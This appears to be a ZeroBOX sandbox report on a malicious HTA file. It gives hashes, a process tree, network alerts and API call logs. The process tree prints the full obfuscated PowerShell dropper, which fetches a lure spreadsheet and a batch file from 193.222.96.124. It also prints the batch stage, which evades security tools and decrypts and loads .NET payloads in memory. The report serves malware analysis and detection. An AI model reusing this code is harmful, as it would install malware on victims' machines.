popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

1.hta

Generic Malware Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P DGA Http API FTP Socket Escalate priviledges DNS Code injection PWS Sniff Audio Steal credential GIF Format AntiDebug Lnk Format ZIP Format AntiVM PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 May 9, 2024, 10:59 a.m. May 9, 2024, 11:05 a.m.
Size 12.6KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 cc022fea5d0660e1e221b02d2c55553b
SHA256 5732fcff80daf0db8287f1ea253768b8644b22464b9dbbf10e188b306afaf47c
CRC32 574B9AC8
ssdeep 384:VoYQ+ed9Q+eOQxKQcpoKKbVQVQcpLKKbFwQiQcprKKbwQPQ+EaKL7Eq7hftyQpST:VYAf1KKbUKKboKKbbTKrIZIZzHotYKA8
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\1.hta

    2552

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function lCfBYm($CxbstDZ, $hOVfNeFjMDKVb){[IO.File]::WriteAllBytes($CxbstDZ, $hOVfNeFjMDKVb)};function tegHetozGCLG($CxbstDZ){if($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46011,46019,46019))) -eq $True){rundll32.exe $CxbstDZ }elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46023,46026,45960))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $CxbstDZ}elseif($CxbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46020,46026,46016))) -eq $True){misexec /qn /i $CxbstDZ}else{Start-Process $CxbstDZ}};function HVPZyUfwsXQUN($AOabLJYpXH){$zAoQSxGInPhmTj = New-Object (YHxkLPuDenWtsw @(45989,46012,46027,45957,45998,46012,46009,45978,46019,46016,46012,46021,46027));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hOVfNeFjMDKVb = $zAoQSxGInPhmTj.DownloadData($AOabLJYpXH);return $hOVfNeFjMDKVb};function YHxkLPuDenWtsw($gDqabOaTrBupDM){$LjTGjOQYKEN=45911;$zmPdEgNuruHTyO=$Null;foreach($IgfJnWcttwE in $gDqabOaTrBupDM){$zmPdEgNuruHTyO+=[char]($IgfJnWcttwE-$LjTGjOQYKEN)};return $zmPdEgNuruHTyO};function vbCETHtlMccKpmVgu(){$MREPVsahkPX = $env:AppData + '\';$alhWjToureJPvdZsBUe = $MREPVsahkPX + '11.xlsx';If(Test-Path -Path $alhWjToureJPvdZsBUe){Invoke-Item $alhWjToureJPvdZsBUe;}Else{ $GuMutFsCYQ = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,45960,45960,45957,46031,46019,46026,46031));lCfBYm $alhWjToureJPvdZsBUe $GuMutFsCYQ;Invoke-Item $alhWjToureJPvdZsBUe;};$hAnIYx = $MREPVsahkPX + 'xD.bat'; if (Test-Path -Path $hAnIYx){tegHetozGCLG $hAnIYx;}Else{ $KeXJYIz = HVPZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961,45961,45961,45957,45968,45965,45957,45960,45961,45963,45969,45966,45961,45967,45966,45958,46031,45979,45957,46009,46008,46027));lCfBYm $hAnIYx $KeXJYIz;tegHetozGCLG $hAnIYx;};;;;}vbCETHtlMccKpmVgu;

      2656

      • EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e

        2816

      • cmd.exe cmd /c ""C:\Users\test22\AppData\Roaming\xD.bat" "

        2980

        • cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\test22\AppData\Roaming\xD.bat"

          1216

          • cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); "

            2116

          • powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            2068

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
193.222.96.124 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 193.222.96.124:7287 -> 192.168.56.101:49163 2400036 ET DROP Spamhaus DROP Listed Traffic Inbound group 37 Misc Attack
TCP 192.168.56.101:49163 -> 193.222.96.124:7287 2027254 ET INFO Dotted Quad Host XLSX Request Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: At line:1 char:693
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + function lCfBYm($CxbstDZ, $hOVfNeFjMDKVb){[IO.File]::WriteAllBytes($CxbstDZ,
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: $hOVfNeFjMDKVb)};function tegHetozGCLG($CxbstDZ){if($CxbstDZ.EndsWith((YHxkLPuD
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: enWtsw @(45957,46011,46019,46019))) -eq $True){rundll32.exe $CxbstDZ }elseif($C
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: xbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46023,46026,45960))) -eq $True){powersh
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: ell.exe -ExecutionPolicy unrestricted -File $CxbstDZ}elseif($CxbstDZ.EndsWith((
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: YHxkLPuDenWtsw @(45957,46020,46026,46016))) -eq $True){misexec /qn /i $CxbstDZ}
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: else{Start-Process $CxbstDZ}};function HVPZyUfwsXQUN($AOabLJYpXH){$zAoQSxGInPhm
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: Tj = New-Object (YHxkLPuDenWtsw @(45989,46012,46027,45957,45998,46012,46009,459
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: 78,46019,46016,46012,46021,46027));[Net.ServicePointManager]:: <<<< SecurityPro
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: tocol = [Net.SecurityProtocolType]::TLS12;$hOVfNeFjMDKVb = $zAoQSxGInPhmTj.Down
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: loadData($AOabLJYpXH);return $hOVfNeFjMDKVb};function YHxkLPuDenWtsw($gDqabOaTr
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: BupDM){$LjTGjOQYKEN=45911;$zmPdEgNuruHTyO=$Null;foreach($IgfJnWcttwE in $gDqabO
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: aTrBupDM){$zmPdEgNuruHTyO+=[char]($IgfJnWcttwE-$LjTGjOQYKEN)};return $zmPdEgNur
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: uHTyO};function vbCETHtlMccKpmVgu(){$MREPVsahkPX = $env:AppData + '\';$alhWjTou
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: reJPvdZsBUe = $MREPVsahkPX + '11.xlsx';If(Test-Path -Path $alhWjToureJPvdZsBUe)
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: {Invoke-Item $alhWjToureJPvdZsBUe;}Else{ $GuMutFsCYQ = HVPZyUfwsXQUN (YHxkLPuDe
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: nWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45968,45962,45957,45961
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: 45966,45958,45960,45960,45957,46031,46019,46026,46031));lCfBYm $alhWjToureJPvdZ
console_handle: 0x00000137
1 1 0

WriteConsoleW

 buffer: sBUe $GuMutFsCYQ;Invoke-Item $alhWjToureJPvdZsBUe;};$hAnIYx = $MREPVsahkPX + 'x
console_handle: 0x00000143
1 1 0

WriteConsoleW

 buffer: D.bat'; if (Test-Path -Path $hAnIYx){tegHetozGCLG $hAnIYx;}Else{ $KeXJYIz = HVP
console_handle: 0x0000014f
1 1 0

WriteConsoleW

 buffer: ZyUfwsXQUN (YHxkLPuDenWtsw @(46015,46027,46027,46023,45969,45958,45958,45960,45
console_handle: 0x0000015b
1 1 0

WriteConsoleW

 buffer: 69,45966,45961,45967,45966,45958,46031,45979,45957,46009,46008,46027));lCfBYm $
console_handle: 0x00000173
1 1 0

WriteConsoleW

 buffer: hAnIYx $KeXJYIz;tegHetozGCLG $hAnIYx;};;;;}vbCETHtlMccKpmVgu;
console_handle: 0x0000017f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x0000018b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000197
1 1 0

WriteConsoleW

 buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: At line:1 char:693
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + function lCfBYm($CxbstDZ, $hOVfNeFjMDKVb){[IO.File]::WriteAllBytes($CxbstDZ,
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: $hOVfNeFjMDKVb)};function tegHetozGCLG($CxbstDZ){if($CxbstDZ.EndsWith((YHxkLPuD
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: enWtsw @(45957,46011,46019,46019))) -eq $True){rundll32.exe $CxbstDZ }elseif($C
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: xbstDZ.EndsWith((YHxkLPuDenWtsw @(45957,46023,46026,45960))) -eq $True){powersh
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: ell.exe -ExecutionPolicy unrestricted -File $CxbstDZ}elseif($CxbstDZ.EndsWith((
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: YHxkLPuDenWtsw @(45957,46020,46026,46016))) -eq $True){misexec /qn /i $CxbstDZ}
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: else{Start-Process $CxbstDZ}};function HVPZyUfwsXQUN($AOabLJYpXH){$zAoQSxGInPhm
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: Tj = New-Object (YHxkLPuDenWtsw @(45989,46012,46027,45957,45998,46012,46009,459
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: 78,46019,46016,46012,46021,46027));[Net.ServicePointManager]:: <<<< SecurityPro
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: tocol = [Net.SecurityProtocolType]::TLS12;$hOVfNeFjMDKVb = $zAoQSxGInPhmTj.Down
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: loadData($AOabLJYpXH);return $hOVfNeFjMDKVb};function YHxkLPuDenWtsw($gDqabOaTr
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: BupDM){$LjTGjOQYKEN=45911;$zmPdEgNuruHTyO=$Null;foreach($IgfJnWcttwE in $gDqabO
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: aTrBupDM){$zmPdEgNuruHTyO+=[char]($IgfJnWcttwE-$LjTGjOQYKEN)};return $zmPdEgNur
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: uHTyO};function vbCETHtlMccKpmVgu(){$MREPVsahkPX = $env:AppData + '\';$alhWjTou
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: reJPvdZsBUe = $MREPVsahkPX + '11.xlsx';If(Test-Path -Path $alhWjToureJPvdZsBUe)
console_handle: 0x00000107
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652900
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652a00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652a00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652a00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652a00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652a00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652a00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006524c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006524c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x006524c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652d80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652e80
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00653280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00653280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00653280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00653280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00653280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00653280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00653280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00653280
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652d00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00652d00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005f6128
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x005f69e8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\12.0\Registration\{90120000-0030-0000-0000-0000000FF1CE}\DigitalProductID
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2552
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02010000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02020000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2656
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x717e1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2656
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x717e2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02021000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02022000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026fb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2656
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
